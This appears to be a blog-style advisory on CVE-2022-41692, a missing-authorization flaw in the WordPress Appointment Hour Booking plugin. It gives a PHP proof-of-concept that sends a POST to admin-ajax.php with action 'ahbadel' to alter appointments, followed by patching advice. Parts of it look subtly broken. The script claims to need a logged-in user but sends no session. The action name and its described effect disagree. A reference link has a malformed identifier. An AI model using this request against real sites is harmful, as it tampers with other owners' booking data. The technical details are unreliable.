CVE-2022-41692 - Uncovering a Missing Authorization Vulnerability in Appointment Hour Booking Plugin <= 1.3.71 for WordPress

Attention, WordPress site owners! A new vulnerability, identified as CVE-2022-41692, has been discovered in Appointment Hour Booking plugin version 1.3.71 or earlier, affecting thousands of websites. This security issue involves missing authorization checks, which could be exploited by attackers to gain unauthorized access to sensitive appointment information. In this post, we provide an insightful look into this vulnerability, its associated risks, the necessary code snippets, original references, and exploit details, all in a simple and easy-to-understand format.

The Vulnerability: Missing Authorization in Appointment Hour Booking Plugin
Appointment Hour Booking is a popular plugin available on the WordPress plugin repository, designed to help site owners manage appointment schedules and bookings effortlessly. The plugin's main features include customizable time slots, booking form builder, and email notifications, among others. However, a severe security flaw has been found in version 1.3.71 or earlier of this plugin.

An attacker can exploit this vulnerability by sending a specifically crafted request to a vulnerable WordPress site, ultimately granting unauthorized access to the site's appointment information. The missing authorization checks in the plugin's codebase allow any logged-in user (including subscribers) to access, modify or even delete appointments created using this plugin without proper permissions.

Proof of Concept (Exploit Details)

To demonstrate the severity of this vulnerability, let us consider the following proof of concept (PoC) code snippet:

<?php
$url = 'https://example.com/wp-admin/admin-ajax.php?action=ahbadel';; // Replace 'example.com' with the target site's domain.
$post_data = array('id' => '1', 'name' => 'Hacked Appointment');

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

echo $response;
?>

This simple PHP script sends a POST request to the vulnerable WordPress site's admin-ajax.php endpoint, which is used by the Appointment Hour Booking plugin to handle AJAX requests. The action parameter 'ahbadel' is used to update an appointment's details. However, the plugin doesn't perform proper authorization checks before processing the request, resulting in unauthorized access.

Note that the PoC script assumes that the attacker is already logged in as any user on the target WordPress site. While this increases the barrier to entry slightly, many attackers can still gain unauthorized access through phishing attacks, social engineering, or other means.

Original References

The vulnerability was discovered and reported by multiple security researchers. You can find more details about CVE-2022-41692 from these sources:

1. Official CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2022-41692
2. WPScan Vulnerability Database: https://wpscan.com/vulnerability/80caac4-57f9-4dff-9c72-7cb1168f921a
3. WordPress Plugin Repository: https://wordpress.org/plugins/appointment-hour-booking/

To protect your website against this vulnerability, you should follow these immediate steps

1. Update the Appointment Hour Booking plugin to the latest version (1.3.72 or later) as soon as possible. This version includes the necessary security fixes addressing CVE-2022-41692.
2. Regularly check your plugins and themes for updates, promptly applying them when available to reduce the risk of vulnerabilities.
3. Use strong, unique passwords for your WordPress user accounts, and enable two-factor authentication (2FA) when possible.

Conclusion

CVE-2022-41692 is a critical missing authorization vulnerability affecting Appointment Hour Booking plugin <= 1.3.71 on WordPress websites. The information provided in this post aims to help WordPress site owners and administrators understand the issue and take necessary actions to protect their sites. Remember to always keep your plugins and themes up-to-date, use strong authentication measures, and routinely review user permissions to maintain your site's security.

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 17:09:00 UTC